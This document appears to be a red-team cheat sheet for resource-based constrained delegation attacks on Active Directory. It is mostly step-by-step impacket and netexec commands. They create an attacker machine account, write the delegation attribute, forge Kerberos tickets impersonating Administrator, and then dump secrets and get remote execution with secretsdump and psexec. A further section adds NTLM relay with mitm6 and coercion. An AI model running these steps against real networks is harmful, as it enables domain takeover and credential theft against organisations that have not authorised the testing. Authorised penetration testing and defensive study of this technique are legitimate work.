#Delegation Types
| Type | Description |
|---|
| Unconstrained | Service can impersonate any user to any service — legacy, most dangerous |
| Constrained | Service can impersonate users to specific target services |
| RBCD | Target resource controls who can delegate to it, via msDS-AllowedToActOnBehalfOfOtherIdentity |
#Prerequisites
- Write access to
msDS-AllowedToActOnBehalfOfOtherIdentity on target computer object - Attacker-controlled machine account (create via
-add-computer or existing) ms-DS-MachineAccountQuota > 0 OR existing controlled machine account
#Attack Flow
plain text
Identify write access to target computer object (ACL review / LDAP relay)
→ Create attacker-controlled machine account
→ Write machine account into target's RBCD attribute
→ S4U2Self — forwardable ticket for Administrator
→ S4U2Proxy — service ticket to target as Administrator
→ Use ticket — WinRM, SMB, LDAP
#Step 0 - Verify Prerequisites
bash
# Check MAQ
nxc ldap <dc-ip> -u <username> -p <password> -M MAQ
# Check write access to target computer object
nxc ldap <dc-ip> -u <username> -p <password> -M daclread -o TARGET=<target-computer>
# Confirm target exists
nxc smb <target-ip> -u <username> -p <password>
#Step 1 - Create Attacker-Controlled Machine Account
bash
impacket-addcomputer \
'<domain.local>/<username>:<password>' \
-computer-name '<attacker-machine>$' \
-computer-pass '<machine-password>' \
-dc-ip <dc-ip>
nxc ldap <dc-ip> -u <username> -p <password> --users | grep <attacker-machine>
#Step 2 - Write RBCD Attribute on Target
bash
impacket-rbcd \
-delegate-to '<target-computer>$' \
-delegate-from '<attacker-machine>$' \
-action write \
'<domain.local>/<username>:<password>' \
-dc-ip <dc-ip>
# Verify
impacket-rbcd \
-delegate-to '<target-computer>$' \
-action read \
'<domain.local>/<username>:<password>' \
-dc-ip <dc-ip>
#Step 3 - Obtain Service Ticket via S4U
bash
impacket-getST \
-spn 'cifs/<target-computer>.<domain.local>' \
-impersonate Administrator \
'<domain.local>/<attacker-machine>$:<machine-password>' \
-dc-ip <dc-ip>
# Saved as Administrator@cifs_<target>.ccache
#Step 4 - Use the Ticket
bash
export KRB5CCNAME=./Administrator@cifs_<target>.ccache
impacket-smbclient -k -no-pass <target-computer>.<domain.local>
impacket-secretsdump -k -no-pass <target-computer>.<domain.local>
impacket-psexec -k -no-pass <target-computer>.<domain.local>
nxc smb <target-ip> -u Administrator -k --use-kcache
#RBCD via LDAP Relay (No Prior Write Access Needed)
bash
# Terminal 1 — relay to LDAP, configure RBCD automatically
impacket-ntlmrelayx \
-t ldaps://<dc-ip> \
-smb2support \
--delegate-access \
--add-computer <attacker-machine>
# Terminal 2 — trigger coercion
sudo mitm6 -d <domain.local>
# OR
nxc smb <target-ip> -u <username> -p <password> -M coerce_plus -o LISTENER=<attacker-ip>
#Flag Reference
impacket-rbcd
| Flag | Meaning |
|---|
-delegate-to | Target computer being modified |
-delegate-from | Attacker-controlled machine account |
-action write | Write delegation attribute |
-action read | Read current attribute (verify) |
-dc-ip | DC IP |
impacket-getST
| Flag | Meaning |
|---|
-spn | Target service — cifs/<target> for SMB, host/<target> for WinRM |
-impersonate | User to impersonate |
-dc-ip | DC IP |
-k | Use Kerberos ticket from KRB5CCNAME |
#What Each Result Tells You
| Finding | Implication |
|---|
| MAQ > 0 | Machine account creation possible |
| Write access on computer object | RBCD viable without relay |
| RBCD attribute written | Proceed to S4U |
| Ticket obtained via getST | Impersonation successful |
| Pwn3d! via nxc after ticket use | Full admin access confirmed |